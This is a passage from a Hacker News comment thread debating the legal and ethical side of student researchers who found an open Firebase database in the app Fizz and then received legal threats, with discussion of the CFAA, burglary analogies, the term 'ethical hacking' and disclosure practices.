               | do the bare minimum of posting "NO TRESPASSING" signs at
               | the border so anyone that walks by them can be said to
               | have observed the difference between your space and the
               | public spaces surrounding it (which they are permitted to
               | be in, just like your private property so long as it's
               | unprotected and they haven't been asked to leave
               | before...)
        
               | jrockway wrote:
               | > That's silly
               | 
               | Yeah, of course ;)
               | 
               | > In the tradition of US property law, I think you need
               | to do the bare minimum of posting "NO TRESPASSING" signs
               | at the border
               | 
               | I guess the law went for an allowlist instead of a
               | denylist this time. Plus one point on their security
               | audit!
               | 
               | > protected computer
               | 
               | As an aside, sometimes I wonder why people make threats
               | like "you must not link to this site without permission".
               | It's like saying "you must not look at my house as you
               | walk by it". You can ask, but it's Not A Thing. I worry
               | that the language could potentially confuse a court
               | someday. (Or that it already did.)
        
               | dahfizz wrote:
               | The term "protected computer" is defined in the CFAA
               | act[1].
               | 
               | Basically its any computer used by a bank, the federal
               | government, or used in interstate commerce.
               | 
               | This is just a quirk of the US system of government. If
               | it doesn't fit those criteria, its going to be up to the
               | state to prosecute based on the state's own version of
               | the cfaa.
               | 
               | [1] https://www.law.cornell.edu/definitions/uscode.php?wi
               | dth=840...
        
               | tptacek wrote:
               | In practice, "protected computer" means "any computer".
        
             | utexaspunk wrote:
             | What about just trying the doorknob to see if it's locked.
             | Is that illegal?
        
             | lcnPylGDnU4H9OF wrote:
             | I wonder if they're conflating CFAA with DMCA 1201[0].
             | They're similar in subject, even if they are actually about
             | different things.
             | 
             | [0] https://www.law.cornell.edu/uscode/text/17/1201
        
             | alasdair_ wrote:
             | This is such a horrible standard. Imagine I put up a web
             | server and only intend myself to access it. I put no
             | security on the pages. Is Google guilty of a CFAA violation
             | for visiting the site?
        
               | dahfizz wrote:
               | The law is not a computer program. It sometimes relies on
               | the ambiguity of human language, and uses human judges &
               | juries to make reasonable decisions within that
               | ambiguity.
               | 
               | I think, in your scenario, you would have a hard time
               | convincing a jury that Google's access to your computer
               | is unauthorized.
        
               | negidius wrote:
               | The same argument could be made about the security
               | research in the article. I think the majority of
               | potential juror would never find someone guilty or liable
               | for this, but there is always the risk that you are
               | unlucky and end up with 12 who would.
        
             | yebyen wrote:
             | It is true that leaving your door unlocked does not give
             | burglars permission to burgle you, but how is an open door
             | different than a closed door?
             | 
             | Legally, I think it's also true that an open door looks
             | more like an invitation to enter (and it's different from
             | burglary to simply poke your head in the door, see if
             | anything is wrong, and not breaking or taking anything)
             | 
             | If an API is served on a public network and your client
             | hits that API with a valid request which returns 200 (not
             | 401) and that API is shaped like an open door, such that no
             | "knock" or similar magic or special protection-breaking
             | incantations were required in order to obtain "the access"
             | ...
             | 
             | Then would you concede it's not actually like a burglary,
             | but a bit more like going in through an open door to see if
             | everyone is OK? (It sounds like that's more precisely what
             | happened here, I'll admit I haven't read it all...)
        
               | tptacek wrote:
               | This isn't complicated. You can be convicted of breaking
               | & entering through an open door. At trial, your defense
               | will have to convince a jury that a reasonable person
               | would believe they were entitled to go through the door.
               | If the door was to, say, a Starbucks, that defense will
               | be compelling indeed. If it is to a private home owned by
               | strangers, you'll be convicted.
               | 
               | I think that's roughly how it will play out in a CFAA
               | case too: the case will turn on why it was you thought
               | you were authorized to tinker with the things you
               | tinkered with. If, as is so often encouraged on HN, your
               | defense turns on the meanings of HTTP response codes,
               | you'll likely be convicted. On the other hand, if you can
               | tell a convincing story about how anybody who understands
               | a little about how a browser works would think that they
               | were just taking a shortcut to something the site owner
               | wanted them to do anyways, you're much more likely to be
               | OK.
               | 
               | If you create an admin account in the database, it won't
               | much matter what position the door was in, so to speak.
               | 
               | The concept we're dancing around here is mens rea.
               | 
               | (Again: DOJ has issued a policy statement saying they're
               | not going after cases like this Fizz thing, so this is
               | all moot anyways.)
        
               | runnerup wrote:
               | > You can be convicted of breaking & entering through an
               | open door.
               | 
               | This definitely must vary by state. At least in Michigan
               | that would just be trespassing. I know, because I had
               | some very in-depth conversations with my lawyer about
               | whether I had committed trespassing or B&E while
               | exploring steam tunnels underneath a university. In my
               | case, B&E couldn't apply because the door was unlocked. I
               | also committed no other crimes besides simple
               | trespassing.
        
               | tptacek wrote:
               | You're totally right. The more accurate thing to say is
               | "you could be convicted of residential burglary by
               | walking through an open door if the prosecution could
               | convince a jury you did so with the intent to commit a
               | further crime".
        
               | runnerup wrote:
               | That sounds right. I also appreciate how much you
               | regularly add to discussion about the CFAA. I personally
               | think it's a horrible law, but for the most part my
               | understanding of it matches yours. Too many people mix up
               | what "should be" vs. "what is".
               | 
               | In general, I've learned that if you ever wonder whether
               | you might be breaking the CFAA, you are in violation of
               | the CFAA. The only time this logic has ever failed that
               | I've seen was HiQ vs. LinkedIn.
        
               | sokoloff wrote:
               | > You can be convicted of breaking & entering through an
               | open door.
               | 
               | That does not appear to be the case in Massachusetts.
               | Here are the jury instructions relevant to B&E in the
               | nighttime, with the full link below:
               | 
               | To prove the defendant guilty of this offense, the
               | Commonwealth must prove four things beyond a reasonable
               | doubt:
               | 
               | First: That the defendant broke into someone else's
               | (building) (ship) (vessel) (vehicle);
               | 
               | Second: That the defendant entered that (building) (ship)
               | (vessel) (vehicle);
               | 
               | ...
               | 
               | To prove the first element, the Commonwealth must prove
               | beyond a reasonable doubt that the defendant exerted
               | physical force, however slight, and thereby removed an
               | obstruction to gaining entry into someone else's
               | (building) (ship) (vessel) (vehicle). Breaking includes
               | moving in a significant manner anything that barred the
               | way into the (building) (ship) (vessel) (vehicle).
               | Examples would include such things as (opening a closed
               | door whether locked or unlocked) (opening a closed window
               | whether locked or unlocked) (going in through an open
               | window that is not intended for use as an entrance). _On
               | the other hand, going through an unobstructed entrance
               | such as an open door does not constitute a breaking._
               | 
               | (Italicized emphasis is mine.) Entering through an open
               | door appears to be an entering (the second element of the
               | crime), but not a breaking (the first element). IANAL.
               | 
               | https://www.mass.gov/doc/8100-breaking-and-entering-a-
               | buildi...
        
               | yebyen wrote:
               | I don't think it's that simple. The prosecution will have
               | to prove the intent to commit a crime. If it looks like a
               | service that should require authorization, and the door
               | is swinging wide open, I think there's a decent argument
               | to be made that you can't prove a reasonable neighbor's
               | intent wasn't to perform a welfare check, and with no
               | criminal intent there is no crime of burglary.
               | 
               | If my neighbor leaves his door open (in the winter, say),
               | and I have cause to believe that something is wrong based
               | on that, is a jury going to convict me for going in there
               | to check on them? It really sounds like that's what was
               | done here.
               | 
               | I guess creating an admin account while I'm in there is a
               | bit like making a key for myself while I look around.
               | That might be over the line. But without that step, I'm
               | not sure how you can have proved that something was even
               | wrong...
               | 
               | I'll go read the article now.
        
               | tptacek wrote:
               | The crime in this case is accessing software running on
               | someone else's computer without their authorization. The
               | "someone else" in this case vehemently objects to the
               | access at issue. The burden of proof is on the
               | prosecution, but their argument is compelling enough that
               | it's the defendant who'd have to do the explaining.
               | 
               | No: you will not get convicted checking on your neighbor.
               | Everybody involved in that fact pattern will believe that
               | you at the time believed it was OK for you to peek into
               | their house. Now change the fact pattern slightly: you're
               | not a neighbor at all, but rather some random person
               | walking down the street. A lot less clear, right?
               | 
               | Anyways that's what these cases are often about: the
               | defendant's state of mind.
               | 
               | Note here that this is a Firebase app, so while it's
               | super obvious to me that issuing an INSERT or UPDATE on a
               | SQL database would cross a line, jiggling the JSON
               | arguments to a Firebase API call to flip a boolean is
               | less problematic, since that's how you test these things.
               | The problem in the SQL case is that as soon as you're
               | speaking SQL, you know you've game-overed the
               | application; you stop there.
        
               | yebyen wrote:
               | > Now change the fact pattern slightly: you're not a
               | neighbor at all, but rather some random person walking
               | 
               | It's times like these I regret that neighbors don't talk
               | to each other anymore. How can we even have functioning
               | internet if we don't have network neighborhood...
        
               | dahfizz wrote:
               | Yes, I think your description is perfectly reasonable.
               | You could make a convincing argument that the researchers
               | poked their head in to an open door. The fact that the
               | law requires you to steal data or otherwise cause damages
               | would support this idea.
               | 
               | I just wanted to argue against the idea that an
               | unprotected computer is fair game for hacking. Morally
               | and legally, it is not.
        
             | Guvante wrote:
             | I do think you adding "if they took data" to this is a bit
             | odd given the original post makes it very clear their
             | defense relied on not taking data or changing anything.
        
             | [deleted]
        
             | supermatt wrote:
             | > accesses a computer without authorization
             | 
             | They were authorized, as per the permissions that fizz gave
             | users of the app on firebase. A group of users noticed that
             | it was overly permissive and reported it to them.
             | 
             | > Leaving your door unlocked does not give burglars
             | permission to burgle you.
             | 
             | This is more like giving your stuff away and then reporting
             | it as theft.
        
               | dahfizz wrote:
               | It's nothing like that. Fizz did not want these people
               | making admin accounts on their server. That's the bottom
               | line. They failed to prevent it (forgot to lock their
               | door), but in no way did they actively "give their stuff
               | away". No judge would see it that way.
        
         | bawolff wrote:
         | > After identifying a vulnerability, the researchers created
         | administrator accounts using the database activity they
         | obtained
         | 
         | Ignoring the legalities of it all, this step crosses a line
         | morally imo.
        
           | epoch_100 wrote:
           | Really what happened is we checked whether we could set
           | `isAdmin` to `true` on our existing accounts, and... we were
           | able to. Adi's more technical writeup has details:
           | https://saligrama.io/blog/post/firebase-insecure-by-default/
        
             | bawolff wrote:
             | With further context that seems much more reasonable then
             | it did at first glance.
        
             | adolph wrote:
             | Did you check with the target before you "checked whether
             | we could set `isAdmin` to `true` on our existing accounts?"
             | 
             | If you did not get consent from a subject, you are not a
             | researcher. If you see a door and check to see if it is
             | unlocked without its owner authorizing you to do so, you
             | are on the ethical side of burglary even if you didn't
             | burgle.
             | 
             | Helpfully the "technical writeup" post links to "industry
             | best practices" [0] which include:
             | 
             |  _If you are carrying out testing under a bug bounty or
             | similar program, the organisation may have established safe
             | harbor policies, that allow you to legally carry out
             | testing, as long as you stay within the scope and rules of
             | their program. Make sure that you read the scope carefully
             | - stepping outside of the scope and rules may be a criminal
             | offence._
             | 
             | The ethically poor behavior of Fizz doesn't mitigate your
             | own.
             | 
             | 0. https://cheatsheetseries.owasp.org/cheatsheets/Vulnerabi
             | lity...
        
               | bawolff wrote:
               | I disagree with this take. There are certainly lines of
               | what is and is not ethical behaviour (where they are is
               | highly debatable), but the vendor doesn't have a monopoly
               | on deciding that.
        
             | tptacek wrote:
             | Yeah, Firebase makes this much more of a gray area than a
             | SQL database would, where you'd know instantly as soon as
             | you issued an INSERT or an UPDATE that you were doing
             | something unauthorized. The writeup is solid, you seem like
             | you took most of the normal precautions a professional team
             | would. The story has the right ending!
        
         | AnthonyMouse wrote:
         | > this is subtle: you can easily rack up 5-6 figure damage
         | numbers from unauthorized security research, but Fizz was so
         | small and new that I'm assuming nobody even contemplating
         | retaining a forensics firm or truing things up with their
         | insurers, who probably did not exist
         | 
         | This seems like a problem with the existing law, if that's how
         | it works.
         | 
         | It puts the amount of "damages" in the hands of the "victim"
         | who can choose to spend arbitrary amounts of resources (trivial
         | in the scope of a large bureaucracy but large in absolute
         | amount), providing a perverse incentive to waste resources in
         | order to vindictively trigger harsh penalties against an
         | imperfect actor whose true transgression was to embarrass them.
         | 
         | And it improperly assigns the cost of such measures, even to
         | the extent that they're legitimate, to the person who merely
         | brought their attention to the need for them. If you've been
         | operating a publicly available service with a serious
         | vulnerability you still have to go through everything and
         | evaluate the scope of the compromise regardless of whether or
         | not _this_ person did anything inappropriate, in case _someone
         | else_ did. The source of that cost was their own action in
         | operating a vulnerable service -- they should still be
         | incurring it even if they discovered the vulnerability
         | themselves, but not before putting it in production.
         | 
         | The damages attributable to the accused _should_ be limited to
         | the damage they _actually caused_ , for example by using access
         | to obtain customer financial information and committing credit
         | card fraud.
        
           | [deleted]
        
           | tptacek wrote:
           | A forensics investigation is usually required by insurers.
           | It's not an arbitrary amount of money, it's just an amount
           | you're not happy with. I understand why you feel that way,
           | but it's not the way the law works.
        
             | woah wrote:
             | > This seems like a problem with the existing law, if
             | that's how it works.
             | 
             | > I understand why you feel that way, but it's not the way
             | the law works.
             | 
             | OP was saying they don't think the law should work that
             | way.
        
               | tptacek wrote:
               | Wait'll they learn about the Eggshell Skull Rule.
        
               | AnthonyMouse wrote:
               | This is more in the neighborhood of contributory
               | negligence.
        
             | AnthonyMouse wrote:
             | Services can negotiate the terms of their insurance
             | contract or even choose whether or not to carry insurance.
             | They agree to these terms and know the implications, and
             | again, if the need for the investigation is legitimate then
             | they should be conducting it regardless of how the
             | vulnerability is uncovered.
             | 
             | > it's not the way the law works.
             | 
             | Which is problematic.
        
       | hermannj314 wrote:
       | I realize it is quick to be against Fizz, but I thought ethical
       | hacking required prior permission.
       | 
       | Am I to understand you can attempt to hack any computer to gain
       | unauthorized access without prior approval? That doesn't seem
       | legal at all.
       | 
       | Whether or not there was a vulnerability, was the action taken
       | actually legal under current law? I don't see anything indicating
       | for or against in the article. Just posturing that "ethical
       | hacking" is good and saying you are secure when you aren't is
       | bad. None of that seems relevant to the actual question of what
       | the law says.
        
         | epoch_100 wrote:
         | I am not a lawyer (of course). But I find some solace/comfort
         | in the new Justice Department guidance to not charge good faith
         | security researchers under CFAA.
         | https://www.theverge.com/2022/5/19/23130910/justice-departme...
        
         | tptacek wrote:
         | (a) There's no such thing as "ethical hacking" (that's an
         | Orwellian term designed to imply that testing conducted in ways
         | unfavorable to vendors is "unethical").
         | 
         | (b) You don't require permission to test software running on
         | hardware you control (absent some contract that says
         | otherwise).
         | 
         | (c) But you're right, in this case, the researchers presumably
         | did need permission to conduct this kind of testing lawfully.
        
           | otterley wrote:
           | I disagree with (a). Activities can be deemed ethical or
           | unethical, and those norms are presumably reflected in our
           | laws (as unauthorized hacking is). When they're not
           | constrained by law (as certain publication and
           | experimentation practices aren't), then they are constrained
           | by social convention.
        
             | tptacek wrote:
             | This is one of those cases, like "Zero Trust Networking"
             | where you can't derive the meaning of a term axiomatically
             | from the individual words. There is "responsible" and
             | "irresponsible" disclosure, too, but "responsible
             | disclosure" is also a specific, Orwellian basket of vendor-
             | friendly policies that have little to do with ethics or
             | responsibility.
        
               | otterley wrote:
               | "Responsible" and "irresponsible" are slippier words in
               | the disclosure context. In the civil legal context,
               | "responsibility" implies blameworthiness and liability
               | arising out of a duty of care and a breach of the duty.
               | But in the vulnerability disclosure context, since
               | there's no duty prescribed by law, it has come to mean
               | "social" vs. "antisocial" - getting along vs. being at
               | odds.
        
               | tptacek wrote:
               | My point is that it doesn't matter how slippery the
               | underlying words are, because you're not meant to piece
               | together the meaning of the statement from those words
               | --- or rather, you are, but deceptively, by attributing
               | them to the policy preferences of the people who coined
               | the term.
               | 
               | Logomachy aside: "ethical hacking" was a term invented by
               | huge companies in the 1990s to co-opt security research,
               | which was at the time largely driven by small independent
               | firms. You didn't want to engage just anybody, the logic
               | went, because lots of those people were secretly
               | criminals. No, you wanted an "ethical hacker" (later: a
               | _certified_ ethical hacker), who you could trust not to
               | commit crimes while working for you.
        
           | wedn3sday wrote:
           | (a) all hacking is unethical? (b) the database was running in
           | the cloud, not on any computer they controlled. (c)
           | everyone's an asshole here
        
             | some_furry wrote:
             | > all hacking is unethical?
             | 
             | No, that's not what tptacek said.
             | 
             | "Ethical hacking" is from the same vein as "responsible
             | disclosure". These are weasel words that are used to demean
             | security researchers who don't kiss the vendors' ass.
             | 
             | As a security researcher, my ethical obligation is not to
             | the vendors of the software. It's to the users.
             | 
             | Ethically speaking, I don't care if my research makes the
             | vendor look bad, hurts their sales, makes their PR team
             | sad, etc. I similarly don't care if my research makes the
             | vendor look good.
             | 
             | Are the users better protected by my research? If yes,
             | ethical. If not, unethical.
             | 
             | Terms like "ethical hacking" are used to stilt the
             | conversation in the favor of vendors.
             | 
             | > the database was running in the cloud, not on any
             | computer they controlled.
             | 
             | If it's running in the Cloud, but in your Cloud account,
             | it's morally equivalent to running on Your Machine. I'm not
             | sure how the law will interpret _anything_ , but given a
             | compelling counter-argument, I don't imagine lawyers will
             | argue differently.
             | 
             | > everyone's an asshole here
             | 
             | Yeah.
        
           | waihtis wrote:
           | > (a) There's no such thing as "ethical hacking"
           | 
           | Weird stance. Sure, you may disagree on the limitations of
           | scope of various ethical hacking programs (bug bounties and
           | such) but they consistently highlight some very serious flaws
           | in all kinds of hardware and software.
           | 
           | Going out of scope (hacking a company with no program in
           | place) is always a gamble and you're betting on the leniency
           | of the target. Probably not worth it unless you like to live
           | dangerously.
        
             | kasey_junk wrote:
             | His point is that the way the term is used, to protect
             | vendors, has nothing to do with ethics.
             | 
             | If a researcher found a serious vuln, the ethical thing may
             | very well be to document it publicly without coordination
             | with the vendor, especially if such coordination hurts
             | users.
        
           | sleepybrett wrote:
           | (a) what if a company hires an external red team to hack
           | their shit, would that not be 'ethical hacking'?
        
             | tptacek wrote:
             | No, because there's no such thing as "ethical hacking";
             | that's a marketing term invented by vendors to constrain
             | researchers. You'd call what you're talking about
             | "pentesting" or "red teaming". How you'd know you had a
             | clownish pentest vendor would be if they themselves called
             | it "ethical hacking".
        
               | jstarfish wrote:
               | There is no precedent for consequence-free probing of
               | others' defenses. Unauthorized "testing conducted in ways
               | unfavorable to vendors" is generally considered a crime
               | of trespass, because everybody has the right to exist
               | unmolested. Whether or not they have their shit together,
               | you aren't authorized to test your kids' school's
               | evacuation procedure by randomly showing up with a toy
               | gun and a vest rigged with hotdogs and wires.
               | 
               | The way this goes in the digital space, people expect to
               | break into my "house," see if they can get into my safe,
               | snoop around in my wife's/daughter's nightstands, steal
               | some of their underwear as a CTF exercise, help
               | themselves to my liquor on the way out, then send me an
               | invoice for their time while also demanding the right (or
               | threatening) to publish everything they found on their
               | blog. Unsolicited "security research" is a shakedown
               | desperate to legitimize itself. Unlawful search/"fruit of
               | the poisoned tree" exists to keep the cops from doing
               | this to you, but it's totally acceptable for self-
               | appointed "researchers" to do to anybody else I guess.
               | 
               | "Ethical hacking" is notifying the owner/authorities
               | there's a potential problem at an address, seeing if they
               | want your help in investigating, and working with them in
               | that capacity-- proceeding to investigate _only with
               | explicit direction_. Even if their incompetence or
               | negligence in response affects you personally, that 's
               | not a cue to break a window and run your own
               | investigation while collecting leverage you can use to
               | shame them into compliance. That shit is just espionage
               | masquerading as concern trolling.
        
               | tptacek wrote:
               | You're doing the same thing the other commenters are:
               | you're trying to derive from first principles what
               | "ethical hacking" means. That's why this marketing trick
               | is so insidious: everybody does that, and attributes to
               | the term whatever they think the right things are. But
               | the term doesn't mean those right things: it means what
               | the vendors meant, which is: co-opted researchers working
               | in collusion with vendors to give dev teams the maximum
               | conceivable amount of time to apply fixes (years, often)
               | and never revealing the details of any flaws (also: that
               | any security researcher that doesn't put the word
               | "ethical" in their title is endorsing criminal hacking;
               | also: that you should buy all your security services from
               | I.B.M.).
               | 
               | You can say "that's not what I mean by ethical hacking",
               | but that doesn't matter, because that's what the term of
               | art itself does mean.
               | 
               | If you want to live in a little rhetorical bubble where
               | terms of art mean what you think they should mean, that's
               | fine. I think it's worth being aware that, to
               | practitioners, that's not what the terms mean, and that
               | people familiar with the field generally won't care about
               | your idiosyncratic definitions.
        
             | akerl_ wrote:
             | As a point of comparison, we don't talk about "ethical
             | plumbing" as a term. If a company hires a plumber to fix
             | their bathroom, they're just a plumber. If somebody breaks
             | the law to enter a place and mess with the pipes, they're
             | just a trespasser.
             | 
             | But the companies that brand themselves as selling
             | "ethical" penetration testing, and sell certifications for
             | "ethical hacking" would very much like you to lump other
             | companies and other security researchers who are operated
             | legally into the same mental bucket as criminals by
             | implicitly painting them as "unethical".
        
       | simonw wrote:
       | I found this story about the same situation (linked from the OP)
       | easier to follow: https://saligrama.io/blog/post/firebase-
       | insecure-by-default/
        
         | epoch_100 wrote:
         | Adi's writeup is great, and goes much more into the technical
         | detail than my transcript. I really recommend everyone checks
         | out his post.
        
       | pityJuke wrote:
       | Wait, they are a company called Fizz, that was formerly called
       | Buzz [0]? Talk about on the nose.
       | 
       | [0]: https://stanforddaily.com/2022/11/01/opinion-fizz-
       | previously...
        
         | justincredible wrote:
         | [dead]
        
       | c4mpute wrote:
       | That's why you always do anonymous immediate full disclosure.
       | 
       | Nothing else is ethically viable. Nothing else protects the
       | researcher.
        
       | kjjw wrote:
       | [flagged]
        
       | asynchronous wrote:
       | TLDR on the actual hack, they forgot to set Firebase security
       | rules, yet again.
       | 
       | How do devs forget this step before raising 4.5 million in seed
       | funding?
        
       | xeromal wrote:
       | Thank the lord for the EFF.
        
       | SoftTalker wrote:
       | A private individual or company cannot file criminal/felony
       | charges. Those are filed by a County Prosecutor, District
       | Attorney, State Attorney, etc after being convinced of probable
       | cause.
       | 
       | They could threaten to report you to the police or such
       | authorities, but they would have to turn over their evidence to
       | them and to you and open all their relevant records to you via
       | discovery.
       | 
       | > Get a lawyer
       | 
       | Yes, if they're seriously threatening legal action they already
       | have one.
        
         | epoch_100 wrote:
         | Yes, threatening to report is what was really happening here.
         | But in their effort to scare us, they elided much of that
         | process. From our perspective it was "watch out, you might face
         | felony charges if you don't agree to silence".
        
           | [deleted]
        
         | aidenn0 wrote:
         | Isn't threatening to report someone to the authorities if you
         | don't do something extortion?
        
           | gingerrr wrote:
           | As the linked article notes, it's explicitly against the
           | California State Bar Code of Conduct to condition criminal
           | proceedings on requiring a civil outcome, so while not
           | technically illegal it's censurable - that's against the
           | attorneys who threatened, not the clients they represent.
        
             | aidenn0 wrote:
             | What I'm pondering is how what happened in TFA is different
             | from a situation like:
             | 
             | 1. I (legally) gather evidence of a neighbor committing a
             | criminal action; e.g. take a picture of them selling
             | illicit drugs.
             | 
             | 2. I threaten to send the evidence to the authorities
             | unless they pay me money.
             | 
             | That seems like blackmail to me, which is illegal under
             | both state and federal law. The only difference I can think
             | of is the consideration. If the consideration must be
             | property for it to count as blackmail, then what about this
             | situation:
             | 
             | 1. I'm engaged in a civil dispute with my neighbor
             | 
             | 2. I gather evidence of them committing a criminal action
             | 
             | 3. I threaten to reveal the evidence unless they settle in
             | my favor
             | 
             | Does that magically become legal because no money exchanges
             | hands?
        
       | Buttons840 wrote:
       | > And then, one day, they sent us a threat. A crazy threat. I
       | remember it vividly. I was just finishing a run when the email
       | came in. And my heart rate went up after I stopped running.
       | That's not what's supposed to happen. They said that we had
       | violated state and federal law. They threatened us with civil and
       | criminal charges. 20 years in prison. They really just threw
       | everything they could at us. And at the end of their threat they
       | had a demand: don't ever talk about your findings publicly.
       | Essentially, if you agree to silence, we won't pursue legal
       | action. We had five days to respond.
       | 
       | This during a time when thousands or millions have their personal
       | data leaked every other week, over and over, because companies
       | don't want to cut into their profits.
       | 
       | Researchers who do the right thing face legal threats of 20 years
       | in prison. Companies who cut corners on security face no
       | consequences. This seems backwards.
       | 
       | Remember when a journalist pressed F12 and saw that a Missouri
       | state website was exposing all the personal data of every teacher
       | in the state (including SSN, etc). He reported the security flaw
       | responsibly and it was embarrassing to the State so the Governor
       | attacked him and legally harassed him.
       | https://arstechnica.com/tech-policy/2021/10/missouri-gov-cal...
       | 
       | I once saw something similar. A government website exposing the
       | personal data of licensed medical professionals. A REST API
       | responded with _all_ their personal data (including SSN, address,
       | etc), but the HTML frontend wouldn 't display it. All the data
       | was just an unauthenticated REST call away, for thousands of
       | people in the state. What did I do? I just closed the tab and
       | never touched the site again. It wasn't worth the personal risk
       | to try to do the right thing so I just ignored it and for all I
       | know all those people had their data stolen multiple times over
       | because of this security flaw. I found the flaw as part of my job
       | at the time, I don't remember the details anymore. It has
       | _probably_ been fixed by now. Our legal system made it a huge
       | personal risk to do the right thing, so I didn 't do the right
       | thing.
       | 
       | Which brings me to my point. We need strong protections for those
       | who expose security flaws in good faith. Even if someone is a
       | grey hat and has done questionable things as part of their
       | "research", as long as they report their security findings
       | responsibly, they should be protected.
       | 
       | Why have we prioritized making things nice and convenient for the
       | companies over all else? If every American's data gets stolen in
       | a massive breach, it's so sad, but there's nothing we can do
       | (shrug). If one curious user or security research pokes an app
       | and finds a flaw, and they weren't authorized to do so, OMG!,
       | that person needs to go to jail for decades, how dare they press
       | F12!!!1
       | 
       | This is a national security issue. While we continue to see the
       | same stories of massive breaches in the news over and over and
       | over, and some of us get yet another free year of monitoring that
       | credit agencies don't commit libel against us, just remember that
       | we put the convenience of companies above all else. They get to
       | opt-in to having their security tested, and over and over they
       | fail us.
       | 
       | Protect security researchers, and make it legal to test the
       | security of an app even if the owning company does not consent.
       | </rant>
        
         | sleepybrett wrote:
         | We need personal data protection laws in this country so that
         | as an individual after a data breach at wherever I can
         | personally sue them for damages. Potentially very significant
         | damages if they leak a full dossier like a credit reporting
         | agency.
         | 
         | If that happens the whole calculus of bug bounties changes
         | immediately.
        
       | helaoban wrote:
       | Don't you have to ask for permission to be white-hat?
        
         | jerf wrote:
         | I'd suggest reading tptacek's comment:
         | https://news.ycombinator.com/item?id=37298589 which does not
         | 100% address your exact question, but gets close. As
         | disclaimed, tptacek is not a lawyer, but has a lot of
         | experience in this space and I'd still take it as a first pass
         | answer.
         | 
         | Personally, I don't see it as worth it to pursue a company that
         | does not hang out some sort of public permission to poke at
         | them. The upside is minimal and the downside significant. Note
         | this is a descriptive statement, not a normative statement. In
         | a perfect world... well, in a perfect world there'd be no
         | security vulnerabilities to find, but... in a perfect world
         | sure you'd never get in trouble for poking through and
         | immediately backing off, but in the real world this story just
         | happens too often. Takes all the fun right out of it. YMMV.
        
       | monksy wrote:
       | Commentary on the journalism:
       | 
       | Fantastic for calling Fizz out. "Fizz did not protect their
       | users' data. What happened next?" This isn't a "someone hacked
       | them". It's that Fizz failed to do what they promised.
       | 
       | I'm still curious to hear if the vulnerability has been tested to
       | see if it's been resolved.
        
       | causality0 wrote:
       | Unless you're looking to earn a bounty, always disclose testing
       | of this type anonymously. Clean device, clean wi-fi, new
       | accounts. That way if they threaten you instead of thanking you
       | you can just drop the exploit details publicly and wash your
       | hands of it.
        
       | borkt wrote:
       | [flagged]
        
         | archgoon wrote:
         | It's fine, particularly for a transcript. Perhaps you lack
         | decent reading skills? Quite common.
        
           | archgoon wrote:
           | [dead]
        
         | epoch_100 wrote:
         | Heh. That's not very nice. If it feels stilted, that's probably
         | because I wrote this primarily to be spoken. But ChatGPT was
         | not involved.
        
           | version_five wrote:
           | I read it and I'm pretty much the most critical person I
           | know, I didn't see any problem with the style, I don't know
           | what that guy's talking about.
        
           | danielvf wrote:
           | Yeah, don't worry about the above complaint. The writing is
           | just fine.
        
         | Pannoniae wrote:
         | I don't think the writing is bad, but even if so, not everyone
         | is good at languages. They got the point across, didn't they?
        
         | trostaft wrote:
         | Perhaps before killing someone with a comment, you should
         | provide examples to back up your vitriol? The guidelines were
         | reposted a mere four days ago...
         | 
         | The writing felt fine to me, if a bit terse.
        
         | kjjw wrote:
         | [flagged]
        
       | aa_is_op wrote:
       | tl;dr?
        
       | nickdothutton wrote:
       | The story has greatly reduced value without knowing who the
       | individuals behind Fizz really are. So that we can avoid doing
       | business with them. It would be different if Fizz was a product
       | of a megacorporation.
       | 
       | "Keep calm" and "be responsible" and "speak to a lawyer" are
       | things I class as common sense. The gold nugget I was looking for
       | was the red flashing shipwreck bouy/marker over the names.
        
         | meepmorp wrote:
         | Ashton Cofer and Teddy Solomon, according to this article:
         | 
         | https://stanforddaily.com/2022/11/01/opinion-fizz-previously...
        
       ___________________________________________________________________
       (page generated 2023-08-28 23:01 UTC)